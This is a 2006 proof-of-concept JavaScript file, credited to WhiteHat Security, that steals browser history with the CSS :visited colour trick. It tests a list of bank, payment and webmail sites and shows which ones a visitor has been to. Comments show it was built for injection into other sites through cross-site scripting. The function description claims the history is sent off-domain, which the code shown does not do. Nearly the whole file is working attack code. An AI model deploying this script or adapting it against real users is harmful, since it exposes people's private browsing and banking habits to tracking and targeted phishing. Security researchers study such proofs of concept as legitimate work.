/*
NAME: (Proof-of-Concept) Steal Browser History
DESCRIPTION: Using a CSS color trick, you can detecting where a browser
has been.
VERSION: 1.0
AUTHOR: Jeremiah Grossman, Founder and CTO of WhiteHat Security, Inc.
NOTE: Only tested in Firefox

BSD LICENSE:
Copyright (c) 2006, WhiteHat Security, Inc.
All rights reserved.

Redistribution and use in source and binary forms, with or without 
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, 
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, 
this list of conditions and the following disclaimer in the documentation 
and/or other materials provided with the distribution.
* Neither the name of the WhiteHat Security nor the names of its contributors 
may be used to endorse or promote products derived from this software 
without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE 
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF 
THE POSSIBILITY OF SUCH DAMAGE.
*/


// popular websites. Lookup if user has visited any.
var websites = [
	"http://www.barclays.co.uk/",
	"http://www.lloydstsb.com/",
	"http://www.hsbc.co.uk/",
	"http://www.hsbc.com/",
	"http://www.paypal.com/",
	"http://www.paypal.co.uk/",
	"http://www.hotmail.com/",
	"http://login.yahoo.com/",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.ebay.co.uk/",
	"http://www.google.co.uk/",
	"http://www.yahoo.co.uk/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/"
];

// zebra stripes
var color = 1;
var colors = ["#FFFFFF", "#F1F1F1"];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	var fill_me;
	fill_me = document.getElementById ("fill_me");

	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '100%';
	d.align = 'center';
	d.id = 'data';
	fill_me.appendChild(d);
	
	
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');
	document.writeln('');

	/* launch steal history */
	stealHistory();	
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL.			#
-----------------------------------------------------------------------*/
function stealHistory() {
	
	// add section title
	dataRow("History");
	
	// loop through websites and check which ones have been visited
	for (var i = 0; i < websites.length; i++) {
	
		var link = document.createElement("a");
		link.id = "id" + i;
		link.href = websites[i];
		link.innerHTML = websites[i];
		
		document.body.appendChild(link);
		var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
		document.body.removeChild(link);

		// check for visited
		if (color == "rgb(0, 0, 255)") {
			dataEntry('<span style="color: red">visited</span>', '<a href="' + websites[i] + '">' + websites[i] + '</a>');
		} else {
			dataEntry("not visited", '<a href="' + websites[i] + '">' + websites[i] + '</a>');
		} // end visited check
		
	} // end visited website loop
	
	
} // end stealHistory method

// add titled row
function dataRow(title) {

	var data = document.getElementById('data');
	
	var tr = document.createElement('tr');
	tr.setAttribute("class", "historyTableHead");
	var td = document.createElement('th');
	td.setAttribute("colspan", "2");
	td.innerHTML = title;
	data.appendChild(tr);
	tr.appendChild(td);

} // end dataRow subroutine

// add row for data
function dataEntry(name, value) {

	if (! document.getElementById('data')) {
		var d = document.createElement('table');
		d.border = 0;
		d.cellpadding = 5;
		d.cellspacing = 10;
		d.width = '90%';
		d.align = 'center';
		d.id = 'data';
		document.body.appendChild(d);
	}

	var data = document.getElementById('data');
	
	var tr = document.createElement('tr');
	tr.setAttribute("class", "entry");
	tr.setAttribute("bgcolor", colors[color]);
	tr.setAttribute("align", 'left');
	var td1 = document.createElement('td');
	td1.width = "100";
	td1.innerHTML = "<b>" + name + "</b>";
	var td2 = document.createElement('td');
	td2.innerHTML = value;
	
	data.appendChild(tr);
	tr.appendChild(td1);
	tr.appendChild(td2);
	
	if (color == 0) {
		color = 1;
	} else {
		color = 0;
	}
} // end dataEntry subroutine